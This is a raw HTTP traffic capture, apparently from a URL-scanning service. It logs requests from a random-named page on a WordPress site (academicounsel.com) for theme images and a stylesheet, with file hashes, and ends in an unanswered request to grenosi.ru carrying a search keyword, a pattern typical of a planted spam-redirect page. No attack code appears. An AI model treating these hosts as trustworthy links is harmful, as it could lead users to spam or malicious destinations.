Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "73f-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 1855
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 35 x 76, 8-bit/color RGBA, non-interlaced
Size:   1855
Md5:    c2e3d11fb3429fbdd51ac7a9393b751f
Sha1:   ea3c9a397a678dace20cbb44277f320b8dd06065
Sha256: db3014b9b3b773a71e53322650b048dd12bbc36017991d3441a381be934f2210
                                        
                                            GET /wp-content/themes/theme48340/images/icon3.png HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "934-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 2356
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 34 x 76, 8-bit/color RGBA, non-interlaced
Size:   2356
Md5:    39c8f3283869aefa40d2912a2769b0bf
Sha1:   844da4a385c0302acc8c2c71e5cf55f23316df3f
Sha256: 1aa5713993429387f325c0d7bcd40f446a4c167fc922fc3a9d05587c20102b96
                                        
                                            GET /wp-content/themes/theme48340/images/icon4.png HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:42 GMT
Etag: "9a1-503fc5688c880"
Accept-Ranges: bytes
Content-Length: 2465
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 35 x 76, 8-bit/color RGBA, non-interlaced
Size:   2465
Md5:    9a0c97c677f3d39dde2a5f5440225619
Sha1:   3e82adddbbd86b09a213e3ec854c97b447ee02f1
Sha256: 8343f7507e30c1d6f995a1787f9ed57aafedb9e19fffd6e2278a23efb298003b
                                        
                                            GET /wp-content/themes/theme48340/favicon.ico HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "37e-503fc564bbf80"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=2592000
Expires: Sat, 30 Jun 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   894
Md5:    754f6bcccbeae19997d3fff2c0bc6e17
Sha1:   ef0215855b117a6046f9412cda5f4872aafc898d
Sha256: 63879df0f25d73845662d6d173e1cf19667aaa0be2a4438b104231a10d93833d
                                        
                                            GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/wp-content/themes/CherryFramework/style.css

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Sun, 28 Sep 2014 07:32:34 GMT
Etag: "fd4e-5041b27540880-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 01 Jun 2018 16:17:54 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11890
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11890
Md5:    fa363e396ba16e7d615dd8a2ed5900d9
Sha1:   e42b58d1367cbe52a38533ed4c368cd449fff6b9
Sha256: 109eb7c2ab6d7837a3683eb8faacba6a052157bd2d5e4c64b5e419fab4f2cc9c
                                        
                                            GET /wp-content/uploads/2011/09/testi-2_small.jpg HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 31 May 2018 16:17:54 GMT
Server: Apache
Last-Modified: Fri, 26 Sep 2014 18:46:38 GMT
Etag: "42e1-503fc564bbf80"
Accept-Ranges: bytes
Content-Length: 17121
Cache-Control: max-age=5184000
Expires: Mon, 30 Jul 2018 16:17:54 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   17121
Md5:    cb31ecbae0272e9899c20944c00a70a4
Sha1:   c435f0c209ce65adaa83d20c6344d672bcfaef4e
Sha256: 8812926a1c47eac99fb43e433577b17d7e244f5be496a05a1d38b5c68cffbf6e
                                        
                                            GET /3d33?charset=utf-8&keyword=honeysuckle%20hill%20pumpkin%20patch HTTP/1.1 
Host: grenosi.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         0.0.0.0
                                        


--- Additional Info ---